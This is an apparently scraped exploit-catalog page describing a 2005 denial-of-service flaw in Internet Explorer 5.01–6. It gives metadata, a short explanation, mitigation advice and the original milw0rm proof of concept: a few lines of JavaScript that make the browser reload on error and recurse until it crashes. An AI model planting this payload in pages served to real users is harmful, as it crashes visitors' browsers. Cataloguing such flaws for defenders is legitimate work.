header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
milw0rm
7.5
CVSS
HIGH
Microsoft Internet Explorer Denial of Service
119
CWE
Product Name: Internet Explorer
Affected Version From: 05.01
Affected Version To: 6
Patch Exists: YES
Related CWE: CVE-2005-1250
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=10320
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

Microsoft Internet Explorer Denial of Service

This vulnerability allows remote attackers to cause a denial of service (crash) in Microsoft Internet Explorer. The vulnerability is caused due to an error in the handling of the "window.onerror" event handler. By calling a function that does not exist, an attacker can cause a stack overflow and crash the browser. This vulnerability affects Internet Explorer 5.01, 5.5 and 6.0.

Mitigation:

Upgrade to the latest version of Internet Explorer.
Source

Exploit-DB raw data:

<script>
window.onerror=new Function("history.go(0)");
function btf(){btf();}
btf();
</script>

# milw0rm.com [2005-05-31]

Navigation

Suggest Exploit

Services By CQR